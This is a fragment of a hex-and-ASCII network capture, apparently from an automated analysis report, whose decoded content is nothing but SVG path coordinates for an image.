                                                                                                                                                                                                                                                                          Data Ascii: .62"></path><path class="cls-7" d="M110.12,162a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4855INData Raw: 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 39 2e 30 37 2c 32 35 37 2e 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: cls-7" d="M149.07,257.39a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4871INData Raw: 2e 37 38 2c 31 30 37 2e 32 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c
                                                                                                                                                                                                                                                                          Data Ascii: .78,107.24a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4887INData Raw: 37 32 2c 32 30 32 2e 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 72,202.6a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4903INData Raw: 2c 32 39 38 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,298a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4919INData Raw: 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4935INData Raw: 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4951INData Raw: 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5128INData Raw: 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: -4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5144INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 32 2c 33 34 37 2e 32 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M312,347.21a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5160INData Raw: 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-.91,2.61,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5176INData Raw: 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M367,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5192INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 35 32 2c 33 35 32 2e 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: s-9" d="M402.52,352.23a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5208INData Raw: 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 32 2c 31 39 37 2e 39 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M422,197.93a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5224INData Raw: 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: -.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8,2.8,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5240INData Raw: 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 37 39 2c 33 34 39 2e 31 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: th class="cls-9" d="M492.79,349.18a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5256INData Raw: 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 32 32 2c 31 39 34 2e 38 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 41 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,.18,3.33"></path><path class="cls-9" d="M512.22,194.87a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1A2.8,2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5272INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 41 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2c 35 34 33 2c 32 37 36 61 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c
